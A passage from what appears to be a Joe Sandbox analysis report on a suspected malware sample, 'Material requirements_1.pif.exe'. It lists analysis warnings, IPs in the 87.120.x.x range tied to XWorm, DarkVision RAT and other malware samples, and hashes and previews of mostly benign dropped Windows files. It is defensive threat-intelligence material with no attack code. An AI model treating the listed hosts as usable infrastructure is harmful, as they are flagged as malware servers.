                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 52.149.20.212
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      06:40:01API Interceptor4541661x Sleep call for process: Material requirements_1.pif.exe modified
                      06:40:03API Interceptor9x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      UNACS-AS-BG8000BurgasBG17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeGet hashmaliciousXWormBrowse
                      • 87.120.116.179
                      17363364631bc7418009f735fbf6670730f0df5be418dd7fb7bf7e79b36349f3b17d812142896.dat-decoded.exeGet hashmaliciousXWormBrowse
                      • 87.120.116.179
                      Inquiry List.docGet hashmaliciousDarkVision RatBrowse
                      • 87.120.113.91
                      3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                      • 87.120.126.5
                      XClient.exeGet hashmaliciousXWormBrowse
                      • 87.120.125.47
                      file.exeGet hashmaliciousDcRat, JasonRATBrowse
                      • 87.120.113.91
                      009274965.lnkGet hashmaliciousDarkVision RatBrowse
                      • 87.120.113.91
                      hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                      • 87.120.115.216
                      rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                      • 87.120.113.63
                      rebirth.spc.elfGet hashmaliciousGafgytBrowse
                      • 87.120.113.63

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Material requirements_1.pif.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1172
                      Entropy (8bit):5.354777075714867
                      Encrypted:false
                      SSDEEP:24:3gWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:QWSU4xymI4RfoUeW+mZ9tK8ND3
                      MD5:0CBD5C86CC1353C7EF09E2ED3E0829E3
                      SHA1:0FFE29A715ED1E32BB9491D3DD88FB72280ED040
                      SHA-256:B7A6D1B47CEA0A5084460775416103112E56A7A423216183ABAC974960FD51E7
                      SHA-512:C60EC6550188DCCD1EAD93CC49011BAC45134426ADEF81410468A1F613AD8F2E67AEF296F5C92092A62BFAC746FCA9DC8741FEC5600996F28A48BF2488E94D40
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gseijm3c.krm.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0diqpim.ksk.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgbipapt.ssa.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqjbbnh1.zdv.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Windows\INF\WmiApRpl\WmiApRpl.h

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3444
                      Entropy (8bit):5.011954215267298
                      Encrypted:false
                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                      MD5:B133A676D139032A27DE3D9619E70091
                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                      Malicious:false
                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                      C:\Windows\INF\WmiApRpl\WmiApRpl.ini

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                      Category:dropped
                      Size (bytes):48786
                      Entropy (8bit):3.5854495362228453
                      Encrypted:false
                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                      Malicious:false
                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                      C:\Windows\System32\PerfStringBackup.INI

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):840878
                      Entropy (8bit):3.4224066455051885
                      Encrypted:false
                      SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                      MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                      SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                      SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                      SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                      Malicious:false
                      Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

                      C:\Windows\System32\PerfStringBackup.TMP

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):840878
                      Entropy (8bit):3.4224066455051885
                      Encrypted:false
                      SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                      MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                      SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                      SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                      SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                      Malicious:false
                      Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

                      C:\Windows\System32\perfc009.dat

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):137550
                      Entropy (8bit):3.409189992022338
                      Encrypted:false
                      SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
                      MD5:084B771A167854C5B38E25D4E199B637
                      SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
                      SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
                      SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
                      Malicious:false
                      Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

                      C:\Windows\System32\perfh009.dat

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):715050
                      Entropy (8bit):3.278818886805871
                      Encrypted:false
                      SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
                      MD5:342BC94F85E143BE85B5B997163A0BB3
                      SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
                      SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
                      SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
                      Malicious:false
                      Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

                      C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3444
                      Entropy (8bit):5.011954215267298
                      Encrypted:false
                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                      MD5:B133A676D139032A27DE3D9619E70091
                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                      Malicious:false
                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                      C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                      Category:dropped
                      Size (bytes):48786
                      Entropy (8bit):3.5854495362228453
                      Encrypted:false
                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                      Malicious:false
                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                      C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                      Download File
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3444
                      Entropy (8bit):5.011954215267298
                      Encrypted:false
                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                      MD5:B133A676D139032A27DE3D9619E70091
                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                      Malicious:false
                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                      C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

                      Download File
